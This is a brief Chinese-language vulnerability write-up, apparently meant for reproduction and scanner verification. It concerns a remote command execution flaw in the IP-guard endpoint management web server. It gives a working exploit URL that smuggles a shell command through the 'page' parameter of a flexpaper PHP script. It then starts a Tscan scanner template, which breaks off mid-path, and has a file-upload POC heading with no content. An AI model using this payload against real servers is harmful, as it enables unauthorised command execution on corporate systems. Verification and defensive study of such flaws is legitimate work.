0x01漏洞描述
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理
0x02漏洞复现
(1)payload利用地址:
/ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+12345+%3Ett.txt
(2)文件上传POC:
0x03POC使用(Tscan验证)
params: []
name: IP-Guard Webserver 远程命令执行漏洞
set:
a4: randomLowercase(8)
a5: randomLowercase(7)
a6: '"SAMEORIGIN"'
rules:
method: GET
path: /ipg/static/ap